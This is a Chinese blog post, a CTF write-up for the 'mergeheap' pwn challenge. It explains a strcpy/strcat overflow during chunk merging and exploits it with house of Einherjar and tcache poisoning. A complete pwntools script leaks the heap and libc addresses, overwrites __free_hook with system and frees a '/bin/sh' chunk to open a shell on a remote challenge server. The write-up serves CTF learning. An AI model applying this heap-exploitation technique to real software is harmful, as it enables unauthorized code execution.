mergeheap

最新推荐文章于 2022-04-10 17:27:59 发布
最新推荐文章于 2022-04-10 17:27:59 发布
阅读量198 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105590786
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

mergeheap

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,在合并的时候,存在溢出,strcpy、strcat可能会将下一个chunk的size也拷贝过来,从而可以溢出修改下一个chunk的size。

并且,由于merge的时候使用的是strcpy、strcat,遇到\0字符会截断,因此当我们写64位地址数据的时候,需要从最后一个开始写,前面全部用不截断的字符填充。依次从后往前完成64位数据的布置。通过伪造chunk,利用house of Einherjar,形成overlap chunk后,修改tcache bin chunk的next指针,达到任意地址分配。

#coding:utf8
from pwn import *

#sh = process('./mergeheap')
sh = remote('node3.buuoj.cn',29551)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']
system_s = libc.sym['system']

def add(size,content):
   sh.sendlineafter('>>','1')
   sh.sendlineafter('len:',str(size))
   sh.sendafter('content:',content)

def show(index):
   sh.sendlineafter('>>','2')
   sh.sendlineafter('idx:',str(index))

def delete(index):
   sh.sendlineafter('>>','3')
   sh.sendlineafter('idx:',str(index))

def merge(index1,index2):
   sh.sendlineafter('>>','4')
   sh.sendlineafter('idx1:',str(index1))
   sh.sendlineafter('idx2:',str(index2))

#0
add(0x80,'a'*0x80)
#1~7
for i in range(7):
   add(0x80,'b'*0x80)
#8
add(0x80,'c'*0x80)
#9
add(0x100,'d'*0x100)
#10
add(0x80,'e'*0x80)
#11
add(0x10,'f'*0x10)
#12
add(0x10,'e'*0x10)
delete(12)
delete(11)
#泄露堆地址
add(0,'') #11
show(11)
heap_addr = u64(sh.recv(6).ljust(8,'\x00'))
print 'heap_addr=',hex(heap_addr)
add(0,'') #12
#7个进tcache
for i in range(1,8):
   delete(i)
#得到unsorted bin
delete(0)
#泄露地址
add(0,'') #0
show(0)
main_arena_xx = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)

####第一次,我们修改size######
#1
add(0x80,'b'*(0x80 - 1) + p8(0x90))
#2
add(0x88,'b'*0x88)
#9放入0x110的tcache bin
delete(9)
#3,合并后,会修改9的size
merge(2,1)
#将chunk8的index换到4来
delete(8)
add(0x80,'c'*0x80) #4

#清空chunk8某处8字节数据
def clearChunk8(offset):
   for i in range(7,-1,-1):
      delete(4)
      add(0x80,'b'*offset + 'b'*i + '\n') #4

def writeChunk8(offset,data):
   delete(4)
   add(0x80,'b'*offset + p64(data)[0:7] + '\n') #4

#清空后一个堆里某处8字节数据
def clearLast(offset):
   for i in range(7,-1,-1):
      #将1、2重新返回tcache bin
      delete(2)
      delete(1)
      #释放0x110的chunk
      delete(3)
      #1
      add(0x80,'b'*offset + 'b'*i + '\n')
      #2
      add(0x88,'b'*0x88)
      #3
      merge(2,1)

def writePrevSize(data):
   #将1、2重新返回tcache bin
   delete(2)
   delete(1)
   #释放0x110的chunk
   delete(3)
   #1
   add(0x80,'b'*(0x80 - 9) + p64(data) + '\n')
   #2
   add(0x88,'b'*0x88)
   #3
   merge(2,1)

####第二次,我们用同样的方法修改prev_size#####
#先清空prev_size处的数据
clearLast(0x80 - 9)
#现在,写prev_size
writePrevSize(0x110 + 0x80)
#我们要在chunk8里伪造一个chunk
#伪造bk
clearChunk8(0x18)
writeChunk8(0x18,heap_addr - 0x250)
#伪造fd
clearChunk8(0x10)
writeChunk8(0x10,heap_addr - 0x250)
#伪造size
clearChunk8(0x8)
writeChunk8(0x8,0x80 + 0x111)
delete(1)
delete(2)
#unsorted bin合并,形成overlap chunk
delete(10)
#0x110的chunk放入tcache bin
delete(3)
#1
add(0x70,'c'*0x70)
#与0x110的chunk重合
add(0x70,p64(free_hook_addr) + '\n')
add(0x100,'/bin/sh\x00\n') #2
#申请到free_hook处
add(0x100,p64(system_addr) + '\n')
#getshell
delete(2)

sh.interactive()

 

ha1vk
关注
专栏目录
Objective-C实现二项式堆binomial heap算法(附完整源码)
希望我的博客,能帮上你解决学习中工作中所遇到的问题
07-08 20
Objective-C实现二项式堆binomial heap算法(附完整源码)
Spark Shuffle源码分析系列之ShuffleReader 二
进击的数据小白
11-07 632
上一节我们分析了ShuffleReadTask是如何获取数据位置,得到各个块数据的,本节我们继续分析Spark对数据是如何存储、聚合、排序,然后供后续算子使用的。 概述 上一节我们讲到了ShuffleReduce任务获取数据的迭代器,那么获取来的数据存放到哪里?刚fetch来的FileSegment存放在缓冲区,经过解压缩和反序列化,如果shuffle算子规定了需要聚合操作,则要使用ExternalAppendOnlyMap进行数据聚合,优先在内存中使用SizeTrackerAppendOnlyMap进.
project-mergeheap
weixin_34050389的博客
01-11 159
ordinary heap merge #include <stdio.h> #include <stdlib.h> #include <time.h>/*time functions library*/ #ifndef _Heap_H #define Max_Size (100000)/*the array-size of heap*/ ...
EPI (Heap) Merge Multiple sorted arrays.
ActiveCoder的博客
05-08 594
#include #include #include using namespace std; /* Write a program that takes an input a set of sorted sequences and compute the union of these sequences as a sorted sequence. For example:
heapq.merge() --合并多个有序序列,再对整个有序序列进行迭代
Jack的博客
10-03 902
问题:我们有一组有序序列,想对它们合并在一起之后的有序序列进行迭代 使用heapq.merge()函数来解决这个问题 import heapq a = [1, 3, 7, 10] b = [2, 5, 6, 11] for c in heapq.merge(a, b): print(c) 1 2 3 5 6 7 10 11 总结: 1、...
hwb_2019_mergeheap
z1r0的博客
04-10 176
hwb_2019_mergeheap 查看保护 利用str的特性遇见\x00会被截断 攻击思路:2.27下泄露lib需要填满7个再释放的时候就是进unsortedbin了。利用strcat将下一个堆块的size都复制过来,形成堆块重叠,然后任意地址写,改hook为one_gadget, from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li = lambda x :
buuctf magicheap
qq_42728977的博客
04-22 224
主要是unsorted bin 在拖链的时候的一些细节 参考
BUUCTF-PWN刷题记录-12
weixin_44145820的博客
04-23 750
ciscn_2019_sw_1 一道思路比较独特的格式化字符串漏洞题目 main函数中只有一次利用漏洞的机会 有system的got表项 一个可行思路是把printf的GOT改为system@plt,然后输入/bin/sh,但是考虑到只有一次机会就比较困难 所以我们需要一个能让main多次执行的办法 这时我们只要把main的地址填入finit_array就能无限循环main函数了 简单介绍一...
Spark源码和调优简介 Spark Core
腾讯技术工程
01-16 1709
作者:calvinrzluo,腾讯 IEG 后台开发工程师本文基于 Spark 2.4.4 版本的源码,试图分析其 Core 模块的部分实现原理,其中如有错误,请指正。为了简化论述,将部...
Android的jni的应用C,C++(基本类型,数组,类(结构体)).源码
05-09
主要是在android中调用C、C++的方法,在网上也搜集了一些文档,源码等资料,非常感谢网友的提供的宝贵经验。 也是写下这个文章,希望可以帮助正在做这方面应用网友们,jni使用c语言。
护网杯2019 mergeheap --pwn
weixin_30552811的博客
09-08 255
护网 又是签到 一天 这道题一开始 不懂得如何泄露 libc 信息,就蒙了 后来群里师傅也是刚刚好 做出 到这里 我就接着做了 。 先看下保护,发现 全开了 然后 就看下流程 大概 就是添加 chunk show 合并两个chunk 可利用的 洞就是 int merge() { int v1; // ST1C_4...
mergeHeapQuickSort - 三种基础排序算法对比
cxy_hust的博客
03-07 451
三种基础排序 归并排序 堆排序 快速排序 1 题目: https://leetcode-cn.com/problems/sort-an-array/ 2 解题思路: 1 分别详细解释 快速排序,归并排序,堆排序 1.1 快速排序 算法核心:选择一个数字,然后将比他大的都移动到他左边,比他小的都是右边,然后分别对左侧区域和右侧区域递归执行即可 速度和稳定性:在单调情况下达到最坏,为O(n**2),不稳定的原因,中枢元素会和最后一个比他小的数字交换位置(以此将左侧分为比他小的,右侧比他大的); 1
ciscn_2019_final_5
z1r0的博客
02-28 252
ciscn_2019_final_5 查看保护 当index为16的时候,经过运算保存的地址为0x20其实也就是heap的初初始地址+0x20。一开始没怎么看懂这些逻辑然后看了一下ha1vk的wp就懂了(XD 攻击思路:因为16的时候在堆的+0x20,所以只需要在堆里伪造一个堆块,然后释放再申请就可以改下面的一些堆块,把下面的堆块释放掉之后通过伪造的堆来改他们的fd达到任意地址申请即可。具体的tcache dup看z1r0’s blog from pwn import * context(arch=
攻防世界PWN之1000levels题解
seaaseesa的博客
11-09 971
1000levevls 本题是一个栈溢出题,难点在于开启了PIE,因此里面的函数地址是随机的。 溢出点在这里 让我们看看提示功能的函数 看看它的汇编代码 不管条件是否成立,system的地址都会保存到这个函数的rbp-110h处,也就是当前函数的栈顶。 我们再看看这个函数 我们进去看看 如果我们输入的levels大于0,v7才有初始化,那么,如果没有初始化,...
ciscn_final_4(反调试+在栈上伪造堆chunk)
seaaseesa的博客
04-30 1157
ciscn_final_4 首先,检查一下程序的保护机制,没开PIE 沙箱禁用了execve,因此不能getshell,只能构造ROP来读取flag 然后,我们用IDA分析一下 Delete功能没有清空堆指针,存在UAF可以造成double free new功能可以自由控制大小 程序一开始,我们可以在栈里输入一些数据,因此,我们可以在栈里伪造一个chunk,然后利用fa...
【攻防世界】Recho
weixin_43960998的博客
03-28 729
1.程序逆向 简单,略 2.漏洞利用 这道题想了半天,没想明白怎么退出循环,所以看了 ha1vk 师傅博客,学习了一波。 退出循环主要是利用 pwntools 提供的一个功能:shutdown。这个功能可以关闭流,这样就可以退出循环了。     因为对于有些系统,system 可以用系统调用,但是有些不行,所以这里采用 orw 的方式读取 flag。 shift + f12 可以看到 flag 字符串,所以也可能是提示我们。 题目中有了 read,write 可以使用
关于分区有序数据merge的解决方案
liguogangde的专栏
10-30 835
一,基本概念   什么是分区数据?如果一张表被水平切分,比如切分成100张相同的表。通过sharding策略把数据分别存放在这100张表中,那么称这100张表的每一张表为一个分区。它们共同组成了这个同类型的数据表。    提供一个例子供以后分析 如: 1,user表分成100个region 2,sharding策略:按照user_id%100决定放到哪个分区。 3,user表有一个ag
二项队列的建立c语言
最新发布
11-10
二项队列是一种基于二项堆的数据结构,它能够实现常见的队列操作,如入队、出队和获取队列元素个数。以下是一个用C语言实现二项队列的简单思路。 首先,需要定义一个二项堆的数据结构。二项堆是一棵满足特定性质的二叉树,每个节点有一个关键字和一个存储队列元素的指针。可以使用一个结构体来表示二项堆的节点。 ```c typedef struct BinomialHeapNode { int key; // 节点关键字 QueueNode* value; // 存储队列元素的指针 int degree; // 子树的度数 struct BinomialHeapNode* parent; // 父节点指针 struct BinomialHeapNode* child; // 第一个子节点指针 struct BinomialHeapNode* sibling; // 兄弟节点指针 } BinomialHeapNode; ``` 接下来,需要实现二项队列的入队操作。入队操作需要将新元素构造为一个二项堆,然后按照二项堆合并的规则与已有的二项堆合并。 ```c void enqueue(BinomialHeapNode** root, int key, QueueNode* value) { BinomialHeapNode* newNode = createNode(key, value); // 创建新节点 BinomialHeapNode* newHeapRoot = newNode; // 新节点作为单元素二项堆的根节点 newHeapRoot->degree = 0; newHeapRoot->parent = NULL; newHeapRoot->child = NULL; newHeapRoot->sibling = NULL; *root = mergeHeap(*root, newHeapRoot); // 合并二项堆,更新根节点指针 } ``` 然后,需要实现二项队列的出队操作。出队操作需要找到具有最小关键字的节点,并从根节点链表中删除该节点,再将其子节点们合并到一个新的二项堆中。 ```c QueueNode* dequeue(BinomialHeapNode** root) { BinomialHeapNode* minNode = findMin(*root); // 找到关键字最小的节点 *root = removeNode(*root, minNode); // 从根节点链表中删除该节点 BinomialHeapNode* childRoot = reverseChildren(minNode); // 将子节点们反转为新的二项堆根 *root = mergeHeap(*root, childRoot); // 合并二项堆,更新根节点指针 QueueNode* dequeuedValue = minNode->value; // 记录要出队的元素 free(minNode); // 释放节点内存 return dequeuedValue; } ``` 最后,通过迭代根节点链表,可以计算出队列的元素个数。 ```c int getSize(BinomialHeapNode* root) { int size = 0; BinomialHeapNode* currentNode = root; while (currentNode != NULL) { size += pow(2, currentNode->degree); // 根节点的度数表示对应子节点数量 currentNode = currentNode->sibling; } return size; } ``` 以上是用C语言实现二项队列的基本思路,具体的实现细节可能因为具体需求和使用的数据结构而有所不同。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值